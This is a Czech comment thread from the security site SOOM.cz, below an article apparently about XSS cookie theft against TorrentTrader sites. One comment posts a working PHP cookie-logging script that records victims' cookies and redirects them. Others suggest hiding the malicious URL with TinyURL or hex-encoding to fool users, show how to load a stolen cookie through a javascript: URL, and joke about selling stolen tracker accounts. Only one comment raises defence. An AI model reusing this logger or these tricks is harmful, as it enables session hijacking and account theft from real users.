Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
Jakub Vrána | Website13.3.2008 10:06
Slušelo by se napsat, že jde o běžný XSS ve variantě vyžadující spolupráci oběti a jak se proti němu dá bránit.

Cookie se dá zadat i jednodušeji než editací souboru cookie.txt. Stačí do adresního řádku prohlížeče napsat javascript:document.cookie='...';
MyFlower | E-mail | Website | ICQ 3355181192.1.2008 14:20
Prvnich deset na googlu po zadani "Powered by torrent trader" ma redirect.php, takze nevim, kde jsi hledal...

----------
Hacker hledá chyby, lama jich zneužívá.
Dotazovač | 83.208.50.*17.12.2007 16:25
De to ještě na náký trackery ? Zkoušel sem jich aspon 10 a všude stránka s redirect neexistovala.
Wary | E-mail | Website | ICQ 741633928.11.2007 10:28
|/V/=|/V|7`/: Když to přeženu tak na privátní trackery se může účet prodávat za menší obnos například... :)

----------
Back in action, fighting for succession!
Mi3ko | E-mail | Website8.11.2007 15:34
ako vam vadi, ked nietko ukradne niekoho account, ale to ze samotny torrent je o kradnuti dusevneho vlastnictva tak to nikoho netrapi :D

----------
no ja som priniesol ten pocitac
lebo je podozrenie ze bol pripojeny na internet
ze tam vselico by mohlo byt
HC | 193.85.29.*20.10.2007 18:29
Krasna to veta "ty chytřejší pochopili, ty méně zdatní pokračují ve čtení"
MyFlower | E-mail | Website | ICQ 33551811915.10.2007 21:40
Já jsem například kvůli "zkušenějším uživatelům" celou tu adresu hodil na TinyUrl.com, takže to na první pohled nešlo poznat, přesměrování je tak rychlý, že to stěží stačíš zastavit a pak.. Pak už je pozdě ;)

----------
Hacker hledá chyby, lama jich zneužívá.
RubberDuck. | 85.71.165.*15.10.2007 21:03
XPxx: Nerikam ze to neni chyba kdyz bych mel jit do detailu tak stejnou najdes v UPLNE kazdem zdrojaku. Jen jsi proste vyuzil moznosti promenne.. Davam plus za myslenku.. Ovsem realizace uz kapanek pokulhava(a tedy davam minus).. Kdyz uz nic urcite bych aspon skriptovou cast URL prekonvertoval do HEXA.. Tim to beznemu uzivateli znecitelnis a zvysis pravdepodobnost "utoku". Dalsi myslenky a rozvijeni teorii uz necham na ostatnich.. :)
|/V/=|/V|7`/ | E-mail | Website15.10.2007 19:25
Pekny, ale jelikoz jsem clovek, co nepouziva torrenty, naskyta se otazka. K cemu je dobry cizy ucet na Torrent Traderu?

----------
*´¨)
¸.·´¸.·´¨)
(¸.·´ (¸.·*´`*·>>> [link] <<<
XPxx | E-mail | ICQ 33587115515.10.2007 18:56
Pěkný, redirect.php který by oběť přesměroval na seznam by mohl vypadat třeba takhle:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$datum = Date("d.m.Y H:i:s");
@$referer = $_SERVER['HTTP_REFERER'];
$file = fopen('log.txt', 'a');
if (!@$referer) { $referer = "NEZNAMY WEB"; }
if ($cookie == "") { $cookie = "NENALEZENA ZADNA COOKIE!"; }
fwrite(
$file,
$datum."
".$referer.":

Cookie: ".$cookie . "
_____________________________________________________


"
);
$location = "Location:[link]";
header($location);

?>

Stránky: 1
© 2003–2024 SOOM.cz | ISSN 1804-7270 | info@soom.cz | IRC #soom | changelog | MzYwNj